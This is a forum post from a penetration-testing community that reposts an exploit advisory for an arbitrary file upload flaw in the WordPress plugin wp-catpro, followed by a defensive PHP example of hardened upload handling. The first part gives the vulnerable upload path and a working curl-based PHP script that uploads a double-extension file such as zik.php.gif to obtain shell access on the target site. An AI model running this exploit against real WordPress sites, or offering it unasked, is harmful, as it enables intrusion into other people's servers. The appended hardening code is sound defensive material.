中国网络渗透测试联盟

Title: WordPress plugin wp-catpro arbitrary file upload

Author: admin    Time: 2013-2-27 20:12
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
Author => Zikou-16
Email => zikou16x@gmail.com
Tested on: Windows 7, Backtrack 5r3
Download: http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php
// Local file to send; the double extension keeps ".gif" as the last extension
$uploadfile = "zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// Multipart POST with the file in "Filedata" and the target folder in "folder"
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";
?>

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif

<?php
phpinfo();
?>
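A defender-side counterpart, added here and not taken from the original post or from the wp-catpro plugin: the permissive check is an assumption about how the vulnerable handler behaved (the advisory shows only its extension list and upload path), and the hardened version shown next to it renames and content-checks every upload so that a name such as zik.php.gif never reaches the uploads directory.

```php
<?php
// Added example, not code from the original post or from the wp-catpro
// plugin. It contrasts an extension check that only looks at the final
// extension (assumed here to be how the vulnerable handler behaved) with a
// hardened replacement that never reuses the client's file name.

const ALLOWED = ['jpg' => 'image/jpeg', 'gif' => 'image/gif', 'png' => 'image/png'];

// Permissive check: "zik.php.gif" ends in an allowed extension, so it is
// accepted and stored with the ".php.gif" suffix intact, which Apache
// configurations using AddHandler for .php will still pass to PHP.
function permissiveCheck(string $clientName): bool
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return isset(ALLOWED[$ext]);
}

// Hardened check: returns a freshly generated name with exactly one
// extension, or null when the upload must be refused.
function hardenedName(string $clientName, string $tmpPath): ?string
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return null;                                  // not on the allow list
    }
    // A dot left in the base name ("zik.php") means a double extension;
    // refuse instead of trying to strip it.
    if (strpos(pathinfo($clientName, PATHINFO_FILENAME), '.') !== false) {
        return null;
    }
    // Decide the type from the bytes, not from the name the client sent.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($tmpPath) !== ALLOWED[$ext]) {
        return null;
    }
    // Random name, single extension: nothing client-controlled survives.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample file carrying a real GIF header.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "GIF89a" . str_repeat("\0", 16));

var_dump(permissiveCheck('zik.php.gif'));      // the advisory's file name
var_dump(hardenedName('zik.php.gif', $tmp));   // same name, hardened path
var_dump(hardenedName('photo.gif', $tmp));     // a legitimate upload
unlink($tmp);
```

Pair the name check with a web-server rule that disables script execution inside wp-content/uploads; the check alone does not help on a server that hands any name containing ".php" to the PHP handler.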




Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2